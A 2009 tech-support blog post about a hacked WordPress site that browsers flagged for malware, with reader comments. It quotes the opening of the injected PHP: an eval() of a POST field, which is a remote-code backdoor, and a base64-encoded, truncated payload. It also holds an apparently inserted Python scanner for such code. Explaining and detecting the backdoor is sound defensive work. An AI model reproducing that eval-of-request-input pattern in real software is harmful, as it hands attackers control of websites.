Industry guru Dave Taylor offers tech support on technical and business topics, including iPhone, iPod, Microsoft Windows, Sony PSP, cellphones, online advertising, CSS, Web design, business, Unix, Linux, SEO, Mac OS X, and shell script programming.     


Visiting my site may harm my computer? What the heck?

As a contributing author to a weblog about South Africa's upcoming World Cup 2010 (see The South Africa Project), I was rather surprised the other day when I went to log in to our WordPress blog, only to see the following warning in my Web browser:

[Image: website malware warning]

What does it mean? How can we get this sort of warning from our own site, without ever opening up anything or getting any indication that we'd been hacked or compromised?

Our first reaction was "that's weird, why would the Web browser be reporting that the site is infected with malware?"

Turns out that modern Web browsers, including Safari and Firefox, actually check in with Google to see if the site has been tagged as having malware. Recall that "malware" is generally spyware or other software that's installed on your computer because you visit the page, often even without your being notified or even being aware it's happened. Think of a virus that's disseminated via Web page. Not good.

The different browsers show this error differently too, by the way.

The warning shown above is from Apple's Safari 4.0 beta. Here's what Firefox shows you:

[Image: website malware warning in Firefox]

I tried Microsoft Internet Explorer, with the phishing controls turned on, and it still didn't have any warnings or cautions when connecting to the site. Another reason to seriously consider using a third-party Web browser, perhaps.

Anyway, when we dug into it, we quickly found that the site had indeed been compromised and that hackers had inserted bad snippets of code in the header of each page, code that started out like this:

<?php if(!function_exists('tmp_lkojfghx'))
{if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZ...

A quick glance at this PHP code shows you that they're cunning, these hackers. They've written their malware and then encoded it, and have the script decode it when invoked (the "base64_decode"). This is so that search engines can't find it, but fortunately Google is paying attention and is one step ahead of them, correctly flagging that indeed, the site is infected with malware.
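As an added example (not code from the original article or from the site's administrator), here is a small Python scanner for the two indicators visible in the snippet above: eval() of request input, and a base64_decode() call on a long literal. The function names and patterns are assumptions chosen for illustration; the sample is the article's snippet, truncated where the article truncates it.

```python
import base64
import re
from pathlib import Path

# Request-controlled input passed straight to eval(): a remote code execution backdoor.
EVAL_INPUT = re.compile(r"eval\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\s*\[", re.I)
# base64_decode('...') called on a long literal: an encoded, hidden payload.
B64_LITERAL = re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]{16,})", re.I)


def decode_prefix(blob: str) -> str:
    """Decode as much of a (possibly truncated) base64 literal as is valid."""
    blob = blob.rstrip("=")
    if len(blob) % 4 == 1:  # a lone trailing character carries no whole byte
        blob = blob[:-1]
    blob += "=" * (-len(blob) % 4)
    return base64.b64decode(blob).decode("latin-1")


def scan_source(source: str) -> dict:
    """Return the indicators found in one PHP source string."""
    payloads = [decode_prefix(m.group(1)) for m in B64_LITERAL.finditer(source)]
    return {
        "eval_of_request_input": bool(EVAL_INPUT.search(source)),
        "decoded_payloads": payloads,
        "injects_script": any("<script" in p.lower() or "<iframe" in p.lower() for p in payloads),
    }


def scan_tree(root: str) -> dict:
    """Scan every .php file under root; return {path: findings} for suspicious files."""
    hits = {}
    for path in Path(root).rglob("*.php"):
        findings = scan_source(path.read_text(errors="replace"))
        if findings["eval_of_request_input"] or findings["decoded_payloads"]:
            hits[str(path)] = findings
    return hits


# Constructed sample: the snippet quoted in the article, cut off where the article cuts it off.
SAMPLE = (
    "<?php if(!function_exists('tmp_lkojfghx'))\n"
    "{if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);"
    "if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',"
    "base64_decode('PHNjcmlwdCBsYW5ndWFnZ"
)

if __name__ == "__main__":
    print(scan_source(SAMPLE))
```

On the article's snippet this flags the eval() of POST input and decodes the visible part of the payload to `<script languag`, which shows the hidden content is script markup written into each page. Run scan_tree() against a copy of the site's files and compare any hits with a clean WordPress download.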

The chap doing the administrative work on the site reported that "we got hacked pretty good. They got in the database as well and changed the passwords. I fixed that, downloaded a clean copy of WordPress and changed FTP & MySQL access."

We're still cleaning up the mess, unfortunately, but what I will say is that if you ever see a warning like we did on a site that you think is clean, stop and immediately call in someone to help you verify that it is clean and not hacked and infected by malware or other unsavory software.

I also encourage you to go read Hardening WordPress, whether you've been hacked or not. An ounce of prevention, and all that.







Categorized: Articles and Reviews , Computer and Internet Basics   (Article 8878, Written by )
Tagged: blogging, firefox, hacking, malware, phishing, safari, security, wordpress




Reader Comments To Date: 4

Christian said, on May 9, 2009 3:11 PM:

Very helpful...thanks.

Zach said, on May 17, 2009 6:33 PM:

Greetings,

Do you know if Face Book will accept Music Widgets? I realize that My Space is a Flash style Program, and that these widgets like that environment, but I really want to know if Face Book is similarly friendly to these programs?

Mike said, on June 25, 2009 1:37 PM:

Different people have gone to our website to conduct business with us, and have complained about receiving viruses. Also getting malware warning.

Please help?

Christian said, on November 30, 2009 4:51 AM:

Hey, I really need your help!! My blog is showing the same warning too!! I don't know how to fix it.. I'm using blogspot. Can u pls pls help me..

© 2002 - 2013 by Dave Taylor. All Rights Reserved.

"Ask Dave Taylor®" is a registered trademark of Intuitive Systems, LLC.